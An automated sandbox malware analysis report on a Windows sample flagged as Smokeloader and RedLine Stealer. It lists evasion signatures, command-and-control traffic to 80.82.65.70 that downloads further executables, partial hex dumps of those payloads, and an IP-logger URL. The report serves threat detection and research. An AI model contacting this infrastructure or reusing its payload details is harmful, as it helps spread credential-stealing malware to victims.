Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1572088
MD5: 054b1e771a301c1e792397a683ed0a90
SHA1: eb209469e0b66a485b135012cf43538ceb9dc96c
SHA256: 6b2391a7841833a3524f5034b7287e55f4c8fbec8678ecf7a6040ada9c07fde1
Tags: exeuser-Bitsight
Infos:

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Entry point lies outside standard sections
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: file.exe Avira: detected
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\soft[1] ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Temp\eJeEe574sR26w1rs\Y-Cleaner.exe ReversingLabs: Detection: 75%
Multi AV Scanner detection for submitted file
Source: file.exe Virustotal: Detection: 50% Perma Link
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\soft[1] Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\eJeEe574sR26w1rs\Y-Cleaner.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: file.exe Joe Sandbox ML: detected
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004035B0 CryptAcquireContextW,CryptCreateHash,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey, 0_2_004035B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04B53817 CryptAcquireContextW,CryptCreateHash,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey, 0_2_04B53817
Uses 32bit PE files
Source: file.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 10 Dec 2024 03:49:43 GMTServer: Apache/2.4.58 (Ubuntu)Content-Disposition: attachment; filename="dll";Content-Length: 242176Keep-Alive: timeout=5, max=86Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4a 6c ef 58 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 a8 03 00 00 08 00 00 00 00 00 00 2e c6 03 00 00 20 00 00 00 e0 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 04 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 c5 03 00 57 00 00 00 00 e0 03 00 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 a6 03 00 00 20 00 00 00 a8 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 10 04 00 00 00 e0 03 00 00 06 00 00 00 aa 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 04 00 00 02 00 00 00 b0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 c6 03 00 00 00 00 00 48 00 00 00 02 00 05 00 a0 60 02 00 34 65 01 00 01 00 00 00 00 00 00 00 90 55 01 00 10 0b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7d 00 59 00 79 00 3d 00 7b 00 58 00 78 00 3d 00 8a 72 93 00 00 70 04 6f 32 00 00 0a 8c 6f 00 00 01 28 33 00 00 0a 02 04 6f 32 00 00 0a 7d 05 00 00 04 2a 3a 02 03 73 01 00 00 06 04 28 02 00 00 06 2a 1e 17 80 06 00 00 04 2a 32 72 df 00 00 70 28 3b 00 00 0a 26 2a 56 72 a8 0f 00 70 80 07 00 00 04 72 a8 0f 00 70 80 08 00 00 04 2a 1e 02 28 1f 00 00 0a 2a 3e 02 fe 15 06 00 00 02 02 03 7d 09 00 00 04 2a be 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 28 45 00 00 0a 7d 09 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 47 00 00 0a 26 2a 3e 02 fe 15 07 00 00 02 02 03 7d 0e 00 00 04 2a aa 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 7d 0e 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 48 00 00 0a 26 2a 22 02 fe 15 08 00 00 02 2a 3e 02 fe 15 09 00 00 02 02 03 7d 18 00 00 04 2a 52 02 03 7d 20 00 00 04 02 02 7b 20 00 00 04 6f 6f 00 00 0a 2a 1e 02 7b 20 00 00 04 2a 22 02 03 7d 21 00 00 04 2a 1e 02 7b 21 00 00 04 2a ea 02 03 7d 1f 00 00 04 02
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 10 Dec 2024 03:49:44 GMTServer: Apache/2.4.58 (Ubuntu)Content-Disposition: attachment; filename="soft";Content-Length: 1502720Keep-Alive: timeout=5, max=85Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5f d5 ce a0 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 30 14 00 00 bc 02 00 00 00 00 00 9e 4f 14 00 00 20 00 00 00 60 14 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 17 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c 4f 14 00 4f 00 00 00 00 60 14 00 f0 b9 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 17 00 0c 00 00 00 30 4f 14 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a4 2f 14 00 00 20 00 00 00 30 14 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 f0 b9 02 00 00 60 14 00 00 ba 02 00 00 32 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 17 00 00 02 00 00 00 ec 16 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4f 14 00 00 00 00 00 48 00 00 00 02 00 05 00 68 7e 00 00 b8 44 00 00 01 00 00 00 55 00 00 06 20 c3 00 00 10 8c 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 13 00 00 0a 2a 1e 02 28 13 00 00 0a 2a ae 7e 01 00 00 04 2d 1e 72 01 00 00 70 d0 03 00 00 02 28 14 00 00 0a 6f 15 00 00 0a 73 16 00 00 0a 80 01 00 00 04 7e 01 00 00 04 2a 1a 7e 02 00 00 04 2a 1e 02 80 02 00 00 04 2a 6a 28 03 00 00 06 72 3d 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 4d 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 b7 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 cb 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 d9 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 eb 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 1f 01 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 1a 7e 03 00 00 04 2a 1e 02 28 18 00 00 0a 2a 56 73 0e 00 00 06 28 19 00 00 0a 74 04 00 00 02 80 03 00 00 04 2a 4e 02 28 1a 00 00 0a 02 28 1e 00 00 06 02 28 11 00 00
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 80.82.65.70 80.82.65.70
Source: unknown TCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknown TCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknown TCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknown TCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknown TCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknown TCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknown TCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknown TCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknown TCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknown TCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknown TCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknown TCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknown TCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknown TCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknown TCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknown TCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknown TCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknown TCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknown TCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknown TCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknown TCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknown TCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknown TCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknown TCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknown TCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknown TCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknown TCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknown TCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknown TCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknown TCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknown TCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknown TCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknown TCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknown TCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknown TCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknown TCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknown TCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknown TCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknown TCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknown TCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknown TCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknown TCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknown TCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknown TCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknown TCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknown TCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknown TCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknown TCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknown TCP traffic detected without corresponding DNS query: 80.82.65.70
Source: unknown TCP traffic detected without corresponding DNS query: 80.82.65.70
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401940 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance, 0_2_00401940
Source: global traffic HTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=emp HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dll/key HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dll/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /soft/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: dHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /soft/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: sHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: file.exe, 00000000.00000002.2405607340.00000000055D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.82.65.70/add?substr=mixtwo&s=three&sub=emp
Source: file.exe, 00000000.00000002.2405607340.00000000055D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.82.65.70/add?substr=mixtwo&s=three&sub=empB
Source: file.exe, 00000000.00000002.2405607340.00000000055D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.82.65.70/dll/download
Source: file.exe, 00000000.00000002.2405607340.00000000055D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.82.65.70/dll/downloadv5
Source: file.exe, 00000000.00000002.2403940495.0000000000FA7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.82.65.70/dll/key5
Source: file.exe, 00000000.00000002.2403940495.0000000000FA7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.82.65.70/dll/keyU
Source: file.exe, 00000000.00000003.2154673575.00000000058D9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2154080791.00000000058D9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2122674612.00000000058D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.82.65.70/files/download
Source: file.exe, 00000000.00000002.2403940495.0000000000F89000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.82.65.70/files/download.
Source: file.exe, 00000000.00000002.2403940495.0000000000F89000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.82.65.70/files/download2
Source: file.exe, 00000000.00000003.2122674612.00000000058D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.82.65.70/files/downloadGs-
Source: file.exe, 00000000.00000003.2154673575.00000000058D9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2154080791.00000000058D9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2122674612.00000000058D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.82.65.70/files/downloadMsW
Source: file.exe, 00000000.00000003.2122674612.00000000058D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.82.65.70/files/downloadSs9
Source: file.exe, 00000000.00000003.2122674612.00000000058D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.82.65.70/files/downloadws
Source: file.exe, 00000000.00000002.2405607340.00000000055D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.82.65.70/soft/download
Source: file.exe, 00000000.00000003.2154673575.00000000058D9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2154080791.00000000058D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.82.65.70/soft/downloadSs9
Source: file.exe, 00000000.00000003.2154673575.00000000058D9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2154080791.00000000058D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.82.65.70/soft/downloadws
Source: Amcache.hve.6.dr String found in binary or memory: http://upx.sf.net
Source: file.exe, 00000000.00000003.2155798821.00000000059B2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2154673575.000000000586D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2155912759.0000000005A41000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2155032478.000000000596F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2156925842.00000000059C8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2156558413.000000000596F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2154029124.0000000005692000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.dr String found in binary or memory: http://www.ccleaner.comqhttps://take.rdrct-now.online/go/ZWKA?p78705p298845p1174
Source: file.exe, 00000000.00000003.2155798821.00000000059B2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2154673575.000000000586D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2155912759.0000000005A41000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2155032478.000000000596F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2156925842.00000000059C8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2156558413.000000000596F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2154029124.0000000005692000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.dr String found in binary or memory: https://g-cleanit.hk
Source: file.exe, 00000000.00000003.2155798821.00000000059B2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2154673575.000000000586D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2155912759.0000000005A41000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2155032478.000000000596F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2156925842.00000000059C8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2156558413.000000000596F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2154029124.0000000005692000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.dr String found in binary or memory: https://iplogger.org/1Pz8p7

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 00000000.00000002.2405026187.0000000004B50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.2403918298.0000000000EEC000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
PE file contains section with special chars
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Detected potential crypto function
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_04D1FD00 0_3_04D1FD00
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_04D1DF87 0_3_04D1DF87
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_04D29706 0_3_04D29706
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_04D13120 0_3_04D13120
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_04D122C0 0_3_04D122C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_04D1E2C9 0_3_04D1E2C9
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_04D24AEE 0_3_04D24AEE
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_04D1AA90 0_3_04D1AA90
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_04D25219 0_3_04D25219
